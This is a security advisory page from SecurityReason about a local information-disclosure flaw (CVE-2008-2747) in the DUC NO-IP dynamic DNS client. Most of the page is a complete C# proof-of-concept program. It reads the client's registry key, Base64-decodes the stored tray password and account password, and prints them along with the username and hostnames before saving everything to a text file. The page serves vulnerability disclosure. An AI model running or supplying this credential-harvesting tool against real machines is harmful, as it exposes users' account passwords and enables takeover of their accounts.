|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3952 CVE : CVE-2008-2747 CWE : CWE-264 SecurityRisk : Low  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : Yes Credit : Charalambous Glafkos Published : 22.06.2008
Advisory Content : /* * DUC NO-IP Local Password Information Disclosure * Author(s): Charalambous Glafkos * George Nicolaou * Date: March 11, 2008 * Site: http://www.astalavista.com * Mail: glafkos (at) astalavista (dot) com [email concealed] * ishtus (at) astalavista (dot) com [email concealed] * * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error. * Attackers can exploit this issue to obtain sensitive information including tray password, * web username, password and hostnames that may lead to further attacks. * * Note: Vendor has been notified long time ago confirming a design error. * Vendor site: http://www.no-ip.com * */ using System; using System.Text; using System.IO; using Microsoft.Win32; namespace getRegistryValue { class getValue { static void Main() { getValue details = new getValue(); String strDUC = details.getDUC(); Console.WriteLine("\nDUC NO-IP Password Decoder v1.2"); Console.WriteLine("Author: Charalambous Glafkos"); Console.WriteLine("Bugs: glafkos (at) astalavista (dot) com [email concealed]"); Console.WriteLine(strDUC); FileInfo t = new FileInfo("no-ip.txt"); StreamWriter Tex = t.CreateText(); Tex.WriteLine(strDUC); Tex.Write(Tex.NewLine); Tex.Close(); Console.WriteLine("\nThe file named no-ip.txt is created\n"); } private string getDUC() { RegistryKey ducKey = Registry.LocalMachine; ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false); String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString()); String Username = ducKey.GetValue("Username").ToString(); String Password = DecodeBytes(ducKey.GetValue("Password").ToString()); String Hostnames = ducKey.GetValue("Hosts").ToString(); String strDUC = "\nTrayPassword: " + TrayPassword + "\nUsername: " + Username + "\nPassword: " + Password + "\nHostnames: " + Hostnames; return strDUC; } public static string DecodeBytes(String encryptedData) { Byte[] toDecodeByte = Convert.FromBase64String(encryptedData); System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding(); System.Text.Decoder utf8Decode = encoder.GetDecoder(); int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length); Char[] decodedChar = new char[charCount]; utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0); String result = new String(decodedChar); return (new string(decodedChar)); } } } References : http://www.securityfocus.com/bid/29758
http://www.securityfocus.com/archive/1/archive/1/493367/100/0/threaded
http://secunia.com/advisories/30714  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |